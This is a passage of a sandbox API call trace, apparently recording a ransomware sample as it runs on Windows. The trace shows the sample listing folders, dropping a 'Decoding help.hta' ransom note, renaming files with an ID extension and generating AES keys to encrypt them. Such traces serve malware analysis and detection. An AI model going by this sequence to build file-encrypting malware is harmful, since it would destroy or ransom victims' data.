dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x96c [0062.517] CreateFileMappingA (hFile=0x96c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8d4 [0062.518] CryptAcquireContextA (phProv=0x1bedfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 973 os_tid = 0x5b8 [0060.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x1bfdfd30 | out: lpFindFileData=0x1bfdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba098 [0060.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.166] FindNextFileW (in: hFindFile=0x10fba098, lpFindFileData=0x1bfdfd30 | out: lpFindFileData=0x1bfdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.166] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.166] FindNextFileW (in: hFindFile=0x10fba098, lpFindFileData=0x1bfdfd30 | out: lpFindFileData=0x1bfdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0060.166] lstrcpyW (in: lpString1=0x10d06a10, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0060.166] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned 53 [0060.166] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Decoding help.hta" [0060.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\decoding help.hta")) returned 0xffffffff [0060.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa84 [0061.469] WriteFile (in: hFile=0xa84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bfdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bfdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.470] CloseHandle (hObject=0xa84) returned 1 [0061.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.470] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IE Add-on site.url") returned -1 [0061.470] lstrlenW (lpString="IE Add-on site.url") returned 18 [0061.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0061.470] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned 53 [0061.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0061.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0061.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" [0061.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8cc [0062.519] CreateFileMappingA (hFile=0x8cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0062.519] CryptAcquireContextA (phProv=0x1bfdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 974 os_tid = 0xc8c [0060.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x1c0dfd30 | out: lpFindFileData=0x1c0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba018 [0060.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.158] FindNextFileW (in: hFindFile=0x10fba018, lpFindFileData=0x1c0dfd30 | out: lpFindFileData=0x1c0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.158] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.158] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.158] FindNextFileW (in: hFindFile=0x10fba018, lpFindFileData=0x1c0dfd30 | out: lpFindFileData=0x1c0dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0060.158] lstrcpyW (in: lpString1=0x10cfea08, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0060.159] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned 47 [0060.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\Decoding help.hta" [0060.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\msn websites\\decoding help.hta")) returned 0xffffffff [0060.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\msn websites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd84 [0060.607] WriteFile (in: hFile=0xd84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c0dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c0dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.608] CloseHandle (hObject=0xd84) returned 1 [0060.608] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.609] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSN Autos.url") returned -1 [0060.609] lstrlenW (lpString="MSN Autos.url") returned 13 [0060.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0060.609] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned 47 [0060.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" [0060.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" [0060.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" [0060.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd84 [0060.610] CreateFileMappingA (hFile=0xd84, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0060.610] CryptAcquireContextA (in: phProv=0x1c0dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c0dfcec*=0x3449df8) returned 1 [0060.611] CryptGenKey (in: hProv=0x3449df8, Algid=0x6610, dwFlags=0x1, phKey=0x1c0dfce8 | out: phKey=0x1c0dfce8*=0x10a4ace8) returned 1 [0060.611] CryptExportKey (in: hKey=0x10a4ace8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1c0dfbe4, pdwDataLen=0x1c0dfce4 | out: pbData=0x1c0dfbe4*, pdwDataLen=0x1c0dfce4*=0x2c) returned 1 [0060.611] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80) Thread: id = 975 os_tid = 0x9ac [0060.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba0d8 [0060.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.166] FindNextFileW (in: hFindFile=0x10fba0d8, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.167] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.167] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.167] FindNextFileW (in: hFindFile=0x10fba0d8, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0060.167] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0060.167] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned 47 [0060.167] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Decoding help.hta" [0060.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\windows live\\decoding help.hta")) returned 0xffffffff [0060.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Decoding help.hta" (normalized: "c:\\users\\default\\favorites\\windows live\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa84 [0061.471] WriteFile (in: hFile=0xa84, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c1dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c1dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.472] CloseHandle (hObject=0xa84) returned 1 [0061.472] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.472] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Get Windows Live.url") returned -1 [0061.472] lstrlenW (lpString="Get Windows Live.url") returned 20 [0061.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0061.472] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned 47 [0061.472] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" [0061.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" [0061.472] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" [0061.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe9c [0062.520] CreateFileMappingA (hFile=0xe9c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xea0 [0062.520] CryptAcquireContextA (phProv=0x1c1dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 976 os_tid = 0xcf0 [0060.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*", lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245584e8 [0060.250] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.250] FindNextFileW (in: hFindFile=0x245584e8, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.250] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.250] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.250] FindNextFileW (in: hFindFile=0x245584e8, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0x0, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0060.250] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*" [0060.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*") returned 66 [0060.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\Decoding help.hta" [0060.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\decoding help.hta")) returned 0xffffffff [0060.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa7c [0061.476] WriteFile (in: hFile=0xa7c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c31fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c31fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.476] CloseHandle (hObject=0xa7c) returned 1 [0061.477] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.477] lstrcmpiW (lpString1="Decoding help.hta", lpString2="au.cab") returned 1 [0061.477] lstrlenW (lpString="au.cab") returned 6 [0061.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*" [0061.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*") returned 66 [0061.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\", lpString2="au.cab" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" [0061.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" [0061.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0061.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js 